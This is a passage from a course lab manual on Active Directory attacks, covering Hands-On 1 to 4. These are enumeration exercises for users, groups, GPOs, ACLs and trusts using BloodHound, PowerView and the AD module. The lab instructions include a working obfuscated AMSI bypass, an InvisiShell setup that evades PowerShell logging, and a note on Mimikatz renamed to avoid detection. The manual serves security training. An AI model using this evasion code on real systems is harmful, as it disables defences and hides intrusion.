0% found this document useful (0 votes)

51 views129 pages

Lab Manual

Uploaded by

liaofangqing26256

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

51 views129 pages

Lab Manual

Uploaded by

liaofangqing26256

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 129

Active Directory Attacks –

Advanced Edition
Lab Manual
Table of Contents
Lab Instructions ............................................................................................................................................. 3
Hands-On 1: .................................................................................................................................................. 4
BloodHound .............................................................................................................................................. 4
AD Module ................................................................................................................................................ 6
Hands-On 2: ................................................................................................................................................ 12
Hands-On 3: ................................................................................................................................................ 16
Hands-On 4: ................................................................................................................................................ 19
Hands-On 5: ................................................................................................................................................ 24
PowerUp ................................................................................................................................................. 24
AccessChk................................................................................................................................................ 25
BloodHound ............................................................................................................................................ 29
Hands-On 6: ................................................................................................................................................ 30
Rubeus and John the Ripper ................................................................................................................... 31
KerberosRequestorSecurityToken.NET class from PowerShell, Mimikatz and tgsrepcrack.py .............. 32
Hands-On 7: ................................................................................................................................................ 34
Hands-On 8: ................................................................................................................................................ 37
Hands-On 9: ................................................................................................................................................ 40
winrs and open-source binaries .............................................................................................................. 40
PowerShell Remoting and Invoke-Mimi ................................................................................................. 42
Hands-On 10: .............................................................................................................................................. 44
Use winrs to access us-jump ................................................................................................................... 46
Hands-On 11: .............................................................................................................................................. 55
Copy Rubeus using xcopy and execute using winrs ................................................................................ 57
Copy and execute Rubeus using PowerShell Remoting .......................................................................... 57
Hands-On 12: .............................................................................................................................................. 61
Hands-On 13: .............................................................................................................................................. 63
Hands-On 14: .............................................................................................................................................. 69
Without using Invoke-Mimi.ps1.............................................................................................................. 69
Using Invoke-Mimi.ps1and PowerShell Remoting .................................................................................. 71
Hands-On 15: .............................................................................................................................................. 73
Hands-On 16: .............................................................................................................................................. 76
Hands-On 17: .............................................................................................................................................. 79
Hands-On 18: .............................................................................................................................................. 85
Hands-on 19: ............................................................................................................................................... 88
Hands-On 20: .............................................................................................................................................. 92
Hands-On 21: .............................................................................................................................................. 95
Hands-On 22: .............................................................................................................................................. 97
Hands-on 23: ............................................................................................................................................... 99
Hands-on 24: ............................................................................................................................................. 102
Hands-on 25: ............................................................................................................................................. 106
Access eushare on euvendor-dc ........................................................................................................... 106
Access euvendor-net using PowerShell Remoting................................................................................ 110
Hands-On 26: ............................................................................................................................................ 113
Hands-On 27: ............................................................................................................................................ 120
Hands-On 28: ............................................................................................................................................ 124

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 2

Lab Instructions
• You can use a web browser or OpenVPN client to access the lab. See the 'Connecting to lab'
document for more details.
• Unless specified otherwise, all the PowerShell based tools (especially those used for enumeration)
are executed using InvisiShell to avoid verbose logging. Binaries like Rubeus.exe may be inconsistent
when used from InvisiShell, run them from the normal command prompt.
• The lab manual uses a terminology for user specific resources. For example, if you see studentuserx
and your user ID is studentuser34, read studentuserx as studentuser34, supportxuser as
support34user and so on.
• All the tools used in the lab are available in C:\AD directory of your student VM.
• The C:\AD directory is exempted from Windows Defender but AMSI may detect some tools when
you load them. The lab manual uses the following AMSI bypass:
SèT-Itèm ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE](
"{1}{0}"-F'F','rE' ) ) ; ( Get-varIÀ`BLE ( ('1Q'+'2U') +'zX' )
-VaL )."A`ssÈmbly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'
),'s',('Syst'+'em') ) )."gètfìElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${nÙLl},${t`RuE} )
• Always double check the NTLM hash and AES keys! They may be different in your lab instance.
• Invoke-Mimikatz.ps1 file is renamed to Invoke-Mimi.ps1 & Invoke-Mimikatz function name is also
renamed to Invoke-Mimi to avoid the detection.
• In Mimikatz, SafetyKatz & BetterSafetyKatz the “ekeys” command is modified to “keys” and “pth”
command is modified to “opassth” to avoid detection. However we can still use both the commands
with all the binaries.
• Please do not attack out-of-scope machines or your fellow students' machines. Please do not
tamper with or delete other students’ files from network directories.

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 3

Hands-On 1:
Task
• Enumerate following for the us.techcorp.local domain:
− Users
− Computers
− Domain Administrators
− Enterprise Administrators
− Kerberos Policy

Solution
We can use the Microsoft's ActiveDirectory module, BloodHound, PowerView or SharpView for
enumerating the domain. Please note that all the enumeration can be done with any other tool of your
choice as well.

BloodHound
BloodHound uses neo4j graph database and it is already installed and running on your VM. To setup
BloodHound, unzip both the BloodHound archives in C:\AD\Tools.

Now, open BloodHound from C:\AD\Tools\BloodHound-win32-x64\BloodHound-win32-x64 and provide

the following details:
bolt://localhost:7687
Username: neo4j
Password: Pass@123

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 4

Run the following commands to gather data and information from the current domain:

PS C:\Users\studentuserx> cd C:\AD\Tools\BloodHound-master\Collectors
C:\AD\Tools\BloodHound-master\Collectors>SharpHound.exe --CollectionMethod
All
-----------------------------------------------
Initializing SharpHound at 3:36 AM on 11/17/2021
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL,

ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain US.TECHCORP.LOCAL using path

CN=Schema,CN=Configuration,DC=techcorp,DC=local
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS

Status: 0 objects finished (+0) -- Using 22 MB RAM
[+] Creating Schema map for domain TECHCORP.LOCAL using path
CN=Schema,CN=Configuration,DC=techcorp,DC=local
[+] Creating Schema map for domain TECHCORP.LOCAL using path
CN=Schema,CN=Configuration,DC=techcorp,DC=local
[+] Creating Schema map for domain TECHCORP.LOCAL using path
CN=Schema,CN=Configuration,DC=techcorp,DC=local
Status: 165 objects finished (+165 82.5)/s -- Using 34 MB RAM
Enumeration finished in 00:00:02.7109867
Compressing data to .\20211117033637_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 3:36 AM on 11/17/2021! Happy Graphing!

We can upload/drag-and-drop the zip archive to BloodHound application for analysis. Press the Ctrl key
to toggle node labeling.

You can run Pre-Built or Custom queries after uploading the data. Below is an example of the built-in
query 'Find Shortest Paths to Domain Admins'.

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 5

I leave it to you for solving individual Hands-On using BloodHound.

Note: Exit BloodHound application once you have stopped using it as it uses good amount of RAM. You
may also like to stop the neo4j service if you are not using BloodHound.

AD Module
Let's start a PowerShell session using Invisishell to avoid verbose logging. We will use Microsoft's AD
Module for solving the tasks of this Hands-On:

C:\Users\studentuserx>cd C:\AD\Tools\

C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\AD\Tools>set COR_ENABLE_PROFILING=1

C:\AD\Tools>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-

b283c03916db}" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-

b283c03916db}\InprocServer32" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-

b283c03916db}\InprocServer32" /ve /t REG_SZ /d
"C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.

C:\AD\Tools>powershell

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 6

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-
master\Microsoft.ActiveDirectory.Management.dll
PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-
master\ActiveDirectory\ActiveDirectory.psd1
PS C:\AD\Tools> Get-ADUser -Filter *

DistinguishedName : CN=Administrator,CN=Users,DC=us,DC=techcorp,DC=local
Enabled : True
GivenName :
Name : Administrator
ObjectClass : user
ObjectGUID : 6065fe62-0dcb-4a5e-bcad-e99f2dec4cdd
SamAccountName : Administrator
SID : S-1-5-21-210670787-2521448726-163245708-500
Surname :
UserPrincipalName :

DistinguishedName : CN=Guest,CN=Users,DC=us,DC=techcorp,DC=local
Enabled : False
GivenName :
Name : Guest
ObjectClass : user
ObjectGUID : 5bc636ba-fa0f-4efe-b50e-de8ca1294598
SamAccountName : Guest
SID : S-1-5-21-210670787-2521448726-163245708-501
Surname :
UserPrincipalName :

DistinguishedName : CN=krbtgt,CN=Users,DC=us,DC=techcorp,DC=local
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 6dce7bd9-287f-4ab3-b5ba-0bb1e8aab391
SamAccountName : krbtgt
SID : S-1-5-21-210670787-2521448726-163245708-502
Surname :
UserPrincipalName :

DistinguishedName : CN=TECHCORP$,CN=Users,DC=us,DC=techcorp,DC=local
Enabled : True
[snip]

To list a specific property of all the users, say, samaccountname:

PS C:\AD\Tools> Get-ADUser -Filter * | Select -ExpandProperty samaccountname

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 7

Administrator
Guest
krbtgt
TECHCORP$
emptest
adconnect
mgmtadmin
helpdeskadmin
dbservice
atauser
exchangeadmin
HealthMailbox3bd1057
[snip]

Now, to enumerate member computers in the domain we can use Get-ADComputer:

PS C:\AD\Tools> Get-ADComputer –Filter * | select –expand name

US-DC
US-EXCHANGE
US-MGMT
US-HELPDESK
US-MSSQL
US-MAILMGMT
US-JUMP
US-WEB
US-ADCONNECT
STUDENT2
STUDENT1
[snip]

To see attributes of the Domain Admins group:

PS C:\AD\Tools> Get-ADGroup -Identity 'Domain Admins' -Properties *

adminCount : 1
CanonicalName : us.techcorp.local/Users/Domain Admins
CN : Domain Admins
Created : 7/5/2019 12:49:17 AM
createTimeStamp : 7/5/2019 12:49:17 AM
Deleted :
Description : Designated administrators of the domain
DisplayName :
DistinguishedName : CN=Domain
Admins,CN=Users,DC=us,DC=techcorp,DC=local
dSCorePropagationData : {7/10/2019 9:53:40 AM, 7/10/2019 9:00:03
AM, 7/6/2019 9:11:13 PM, 7/6/2019 3:04:32
AM...}
GroupCategory : Security
GroupScope : Global

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 8

groupType : -2147483646
HomePage :
instanceType : 4
isCriticalSystemObject : True
isDeleted :
LastKnownParent :
ManagedBy :
member :
{CN=decda,CN=Users,DC=us,DC=techcorp,DC=local,

CN=Administrator,CN=Users,DC=us,DC=techcorp,DC=local}
MemberOf : {CN=Denied RODC Password Replication
Group,CN=Users,DC=us,DC=techcorp,DC=local,

CN=Administrators,CN=Builtin,DC=us,DC=techcorp,DC=local}
Members :
{CN=decda,CN=Users,DC=us,DC=techcorp,DC=local,

CN=Administrator,CN=Users,DC=us,DC=techcorp,DC=local}
Modified : 7/19/2019 12:16:32 PM
modifyTimeStamp : 7/19/2019 12:16:32 PM
Name : Domain Admins
nTSecurityDescriptor :
System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
CN=Group,CN=Schema,CN=Configuration,DC=techcorp,DC=local
ObjectClass : group
ObjectGUID : 218cc77d-0e1c-41ed-91b2-730f6279c325
objectSid : S-1-5-21-210670787-2521448726-163245708-512
ProtectedFromAccidentalDeletion : False
SamAccountName : Domain Admins
sAMAccountType : 268435456
sDRightsEffective : 0
SID : S-1-5-21-210670787-2521448726-163245708-512
SIDHistory : {}
uSNChanged : 282184
uSNCreated : 12315
whenChanged : 7/19/2019 12:16:32 PM
whenCreated : 7/5/2019 12:49:17 AM

To enumerate members of the Domain Admins group:

PS C:\AD\Tools> Get-ADGroupMember -Identity 'Domain Admins'

distinguishedName : CN=Administrator,CN=Users,DC=us,DC=techcorp,DC=local
name : Administrator
objectClass : user
objectGUID : 6065fe62-0dcb-4a5e-bcad-e99f2dec4cdd

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 9

SamAccountName : Administrator
SID : S-1-5-21-210670787-2521448726-163245708-500

distinguishedName : CN=decda,CN=Users,DC=us,DC=techcorp,DC=local
name : decda
objectClass : user
objectGUID : 0dfb0572-730c-432e-9404-769e0584bd95
SamAccountName : decda
SID : S-1-5-21-210670787-2521448726-163245708-1289

To enumerate members of the Enterprise Admins group:

PS C:\AD\Tools> Get-ADGroupMember -Identity 'Enterprise Admins'

Get-ADGroupMember : Cannot find an object with identity: 'Enterprise Admins'
under: 'DC=us,DC=techcorp,DC=local'.
[snip]

Since, our current domain (us.techcorp.local) is not a root domain, the above command returns an
error. We need to query the root domain as Enterprise Admins group is present only in the root of a
forest.

PS C:\AD\Tools> Get-ADGroupMember -Identity 'Enterprise Admins' -Server

techcorp.local

distinguishedName : CN=Administrator,CN=Users,DC=techcorp,DC=local
name : Administrator
objectClass : user
objectGUID : a8ee80ca-edc5-4c5d-a210-b58ca11bd055
SamAccountName : Administrator
SID : S-1-5-21-2781415573-3701854478-2406986946-500

Let’s move on the last task of this hands-on. To find the Kerberos policy, let's use PowerView:

C:\Users\studentuserx>cd C:\AD\Tools\

C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\AD\Tools>set COR_ENABLE_PROFILING=1

C:\AD\Tools>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-

b283c03916db}" /f
The operation completed successfully.

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-

b283c03916db}\InprocServer32" /f
The operation completed successfully.

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 10

C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-
b283c03916db}\InprocServer32" /ve /t REG_SZ /d
"C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.

C:\AD\Tools>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\AD\Tools> . C:\AD\Tools\PowerView.ps1
PS C:\AD\Tools> (Get-DomainPolicy).KerberosPolicy

MaxTicketAge : 10
MaxRenewAge : 7
MaxServiceAge : 600
MaxClockSkew : 5
TicketValidateClient : 1

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 11

Hands-On 2:
Task
• Enumerate following for the us.techcorp.local domain:
− Restricted Groups from GPO
− Membership of the restricted groups
− List all the OUs
− List all the computers in the Students OU.
− List the GPOs
− Enumerate GPO applied on the Students OU.

Solution
We can continue using PowerView from InvisiShell for enumerating GPO. To enumerate Restricted Groups
from GPO:

PS C:\AD\Tools> Get-DomainGPOLocalGroup

GPODisplayName : Mgmt
GPOName : {B78BFC6B-76DB-4AA4-9CF6-26260697A8F9}
GPOPath :
\\us.techcorp.local\SysVol\us.techcorp.local\Policies\{B78BFC6B-76DB-4AA4-
9CF6-26260697A8F9}
GPOType : RestrictedGroups
Filters :
GroupName : US\machineadmins
GroupSID : S-1-5-21-210670787-2521448726-163245708-1118
GroupMemberOf : {S-1-5-32-544}
GroupMembers : {}

Now, to look for membership of the Restricted Groups 'machineadmins' we can use Get-
DomainGroupMember from PowerView or Get-ADGroupMember from AD module:

PS C:\AD\Tools> Get-DomainGroupMember -Identity machineadmins

The group seems to have no members.

Next, use Get-DomainOU or Get-ADOrganizationalUnit to list all the OUs:

PS C:\AD\Tools> Get-DomainOU
usncreated : 7925
systemflags : -1946157056
iscriticalsystemobject : True
gplink : [LDAP://CN={6AC1786C-016F-11D2-945F-
00C04fB984F9},CN=Policies,CN=System,DC=us,DC=techcorp,DC=l
ocal;0]

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 12

whenchanged : 7/5/2019 7:48:21 AM
objectclass : {top, organizationalUnit}
showinadvancedviewonly : False
usnchanged : 7925
dscorepropagationdata : {1/9/2021 7:03:02 AM, 1/9/2021 7:03:02 AM, 1/9/2021
7:03:02 AM, 7/30/2019 12:40:16 PM...}
name : Domain Controllers
description : Default container for domain controllers
distinguishedname : OU=Domain Controllers,DC=us,DC=techcorp,DC=local
ou : Domain Controllers
whencreated : 7/5/2019 7:48:21 AM
instancetype : 4
objectguid : fc0dd146-a66e-45cc-83ae-9e5a0c39ed91
objectcategory : CN=Organizational-
Unit,CN=Schema,CN=Configuration,DC=techcorp,DC=local
[snip]

Now, to list all the computers in the Students OU:

PS C:\AD\Tools> (Get-DomainOU -Identity Students).distinguishedname | %{Get-

DomainComputer -SearchBase $_} | select name

name
----
STUDENT11
STUDENT12
[snip]

Computers in OU using ActiveDirectory module:

PS C:\AD\Tools> Get-ADOrganizationalUnit -Identity

'OU=StudentsMachines,DC=us,DC=techcorp,DC=local' | %{Get-ADComputer
-SearchBase $_ -Filter *} | select name
[snip]

Next task is to list the GPOs. Use the below PowerView command:

PS C:\AD\Tools> Get-DomainGPO
usncreated : 7793
systemflags : -1946157056
displayname : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-
A28C-00C04FB94F17}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4EA-
00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC
-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-
00C04FB94F17}]
whenchanged : 7/20/2019 11:35:15 AM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 13

showinadvancedviewonly : True
usnchanged : 329583
dscorepropagationdata : {7/30/2019 12:35:19 PM, 7/10/2019 4:00:03 PM, 7/10/2019
4:00:03 PM, 7/7/2019 4:11:13 AM...}
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags : 0
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject : True
gpcfilesyspath :
\\us.techcorp.local\sysvol\us.techcorp.local\Policies\{31B2F340-016D-11D2-945F-
00C04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-
00C04FB984F9},CN=Policies,CN=System,DC=us,DC=techcorp,DC=local
whencreated : 7/5/2019 7:48:21 AM
versionnumber : 6
instancetype : 4
objectguid : d0907c7b-9e3e-42e9-ba50-ac23ea8bb598
objectcategory : CN=Group-Policy-
Container,CN=Schema,CN=Configuration,DC=techcorp,DC=local
[snip]

To enumerate GPO applied on the Students OU:

PS C:\AD\Tools> (Get-DomainOU -Identity Students).gplink

[LDAP://cn={FCE16496-C744-4E46-AC89-
2D01D76EAD68},cn=policies,cn=system,DC=us,DC=techcorp,DC=local;0]

PS C:\AD\Tools> Get-DomainGPO -Identity '{FCE16496-C744-4E46-AC89-

2D01D76EAD68}'

usncreated : 330304
displayname : StudentPolicies
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-
3407-48AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4EA-
00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 7/20/2019 2:17:57 PM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 338463
dscorepropagationdata : {7/30/2019 12:35:19 PM, 1/1/1601 12:00:00 AM}
name : {FCE16496-C744-4E46-AC89-2D01D76EAD68}
flags : 0
cn : {FCE16496-C744-4E46-AC89-2D01D76EAD68}
gpcfilesyspath :
\\us.techcorp.local\SysVol\us.techcorp.local\Policies\{FCE16496-C744-4E46-
AC89-2D01D76EAD68}
distinguishedname : CN={FCE16496-C744-4E46-AC89-
2D01D76EAD68},CN=Policies,CN=System,DC=us,DC=techcorp,DC=local
whencreated : 7/20/2019 11:48:51 AM
versionnumber : 4
instancetype : 4

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 14

objectguid : b9bb82a1-5cc2-4264-b4f4-bdf6a238817b
objectcategory : CN=Group-Policy-
Container,CN=Schema,CN=Configuration,DC=techcorp,DC=local

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 15

Hands-On 3:
Task
• Enumerate following for the us.techcorp.local domain:
− ACL for the Domain Admins group
− All modify rights/permissions for the studentuserx

Solution
To enumerate ACLs, we can use Get-ObjectACL from PowerView or Get-ACL with AD:\ PSProvider using
the ActiveDirectory module.

Using PowerView from InvisiShell:

PS C:\AD\Tools> Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -

Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://US-
DC.US.TECHCORP.LOCAL/DC=US,DC=TECHCORP,DC=LOCAL
VERBOSE: [Get-DomainSearcher] search base: LDAP://US-
DC.US.TECHCORP.LOCAL/DC=techcorp,DC=local
VERBOSE: [Get-DomainUser] filter string:
(&(samAccountType=805306368)(|(samAccountName=krbtgt)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://US-
DC.US.TECHCORP.LOCAL/CN=Schema,CN=Configuration,DC=techcorp,DC=local
VERBOSE: [Get-DomainSearcher] search base: LDAP://US-
DC.US.TECHCORP.LOCAL/CN=Extended-Rights,CN=Configuration,DC=techcorp,DC=local
VERBOSE: [Get-DomainObjectAcl] Get-DomainObjectAcl filter string:
(&(|(|(samAccountName=Domain Admins)(name=Domain Admins)(displayname=Domain
Admins))))

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=us,DC=techcorp,DC=local
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren
ObjectAceType : ms-Exch-Active-Sync-Devices
ObjectSID : S-1-5-21-210670787-2521448726-163245708-512
InheritanceFlags : ContainerInherit
BinaryLength : 72
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-21-2781415573-3701854478-2406986946-1119
AccessMask : 7
AuditFlags : None
IsInherited : False
AceFlags : ContainerInherit, InheritOnly
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0
[snip]

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 16

Same task by using ActiveDirectory module from InvisiShell:

PS C:\AD\Tools> Get-ACL 'AD:\CN=Domain

Admins,CN=Users,DC=us,DC=techcorp,DC=local' | select -ExpandProperty Access
ActiveDirectoryRights : GenericRead
InheritanceType : None
ObjectType : 00000000-0000-0000-0000-000000000000
InheritedObjectType : 00000000-0000-0000-0000-000000000000
ObjectFlags : None
AccessControlType : Allow
IdentityReference : NT AUTHORITY\Authenticated Users
IsInherited : False
InheritanceFlags : None
PropagationFlags : None

ActiveDirectoryRights : GenericAll
InheritanceType : None
ObjectType : 00000000-0000-0000-0000-000000000000
InheritedObjectType : 00000000-0000-0000-0000-000000000000
ObjectFlags : None
AccessControlType : Allow
IdentityReference : NT AUTHORITY\SYSTEM
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
[snip]

Now, to check for modify rights/permissions for the studentuserx, we can use Find-InterestingDomainACL
from PowerView. In the below command we filter results for studentuserx. Please note that the below
command may take very long to complete:

PS C:\AD\Tools> Find-InterestingDomainAcl -ResolveGUIDs |

?{$_.IdentityReferenceName -match "studentuserx"}

We don't get any output. This means studentuserx has no modify permissions on any object in the domain.

Let's try for the StudentUsers group. Please note that the below command may take very long to
complete:

PS C:\AD\Tools> Find-InterestingDomainAcl -ResolveGUIDs |

?{$_.IdentityReferenceName -match "StudentUsers"}
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-
210670787-2521448726-163245708-1147' to a distinguishedname with Convert-
ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-
210670787-2521448726-163245708-1147' to a distinguishedname with Convert-
ADName

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 17

WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-
210670787-2521448726-163245708-1147' to a distinguishedname with Convert-
ADName

ObjectDN :
CN=Support11User,CN=Users,DC=us,DC=techcorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-210670787-2521448726-163245708-1116
IdentityReferenceName : studentusers
IdentityReferenceDomain : us.techcorp.local
IdentityReferenceDN : CN=StudentUsers,CN=Users,DC=us,DC=techcorp,DC=local
IdentityReferenceClass : group

ObjectDN :
CN=Support12User,CN=Users,DC=us,DC=techcorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-210670787-2521448726-163245708-1116
IdentityReferenceName : studentusers
IdentityReferenceDomain : us.techcorp.local
IdentityReferenceDN : CN=StudentUsers,CN=Users,DC=us,DC=techcorp,DC=local
IdentityReferenceClass : group

[snip]

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 18

Hands-On 4:
Task
• Enumerate all domains in the techcorp.local forest.
• Map the trusts of the us.techcorp.local domain.
• Map external trusts in techcorp.local forest.
• Identify external trusts of us domain. Can you enumerate trusts for a trusting forest?

Solution
Let’s enumerate all domains using the ActiveDirectory module from InvisiShell:

PS C:\AD\Tools> (Get-ADForest).Domains
techcorp.local
us.techcorp.local

To map the trusts of the us.techcorp.local domain:

PS C:\AD\Tools> Get-ADTrust -Filter *

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName :
CN=techcorp.local,CN=System,DC=us,DC=techcorp,DC=local
ForestTransitive : False
IntraForest : True
IsTreeParent : False
IsTreeRoot : False
Name : techcorp.local
ObjectClass : trustedDomain
ObjectGUID : fe8ef343-0882-490d-8ad2-cb4fb9f974ae
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=us,DC=techcorp,DC=local
Target : techcorp.local
TGTDelegation : False
TrustAttributes : 32
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=eu.local,CN=System,DC=us,DC=techcorp,DC=local
ForestTransitive : False

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 19

IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : eu.local
ObjectClass : trustedDomain
ObjectGUID : 917942a6-ef2d-4c87-8084-35ad6281c89b
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : True
Source : DC=us,DC=techcorp,DC=local
Target : eu.local
TGTDelegation : False
TrustAttributes : 4
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

If we want to map all the trusts of the techcorp.local forest:

PS C:\AD\Tools> Get-ADTrust -Filter 'intraForest -ne $True' -Server (Get-

ADForest).Name

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=usvendor.local,CN=System,DC=techcorp,DC=local
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : usvendor.local
ObjectClass : trustedDomain
ObjectGUID : 481a3ade-0e65-4dc5-baf0-fc692a3a10c5
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=techcorp,DC=local
Target : usvendor.local
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 20

Direction : Inbound
DisallowTransivity : False
DistinguishedName : CN=bastion.local,CN=System,DC=techcorp,DC=local
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : bastion.local
ObjectClass : trustedDomain
ObjectGUID : aa11321f-6629-4deb-a2fe-2bf79e169904
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=techcorp,DC=local
Target : bastion.local
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

Now, to list only the external trusts, using the ActiveDirectory module:

PS C:\AD\Tools> (Get-ADForest).Domains | %{Get-ADTrust -Filter '(intraForest

-ne $True) -and (ForestTransitive -ne $True)' -Server $_}
Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=eu.local,CN=System,DC=us,DC=techcorp,DC=local
ForestTransitive : False
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : eu.local
ObjectClass : trustedDomain
ObjectGUID : 917942a6-ef2d-4c87-8084-35ad6281c89b
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : True
Source : DC=us,DC=techcorp,DC=local
Target : eu.local
TGTDelegation : False
TrustAttributes : 4
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False

AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 21

UsesAESKeys : False
UsesRC4Encryption : False

To list only the external trusts using PowerView:

PS C:\AD\Tools> Get-ForestDomain -Verbose | Get-DomainTrust |

?{$_.TrustAttributes -eq 'FILTER_SIDS'}
VERBOSE: [Get-DomainSearcher] search base: LDAP://US-
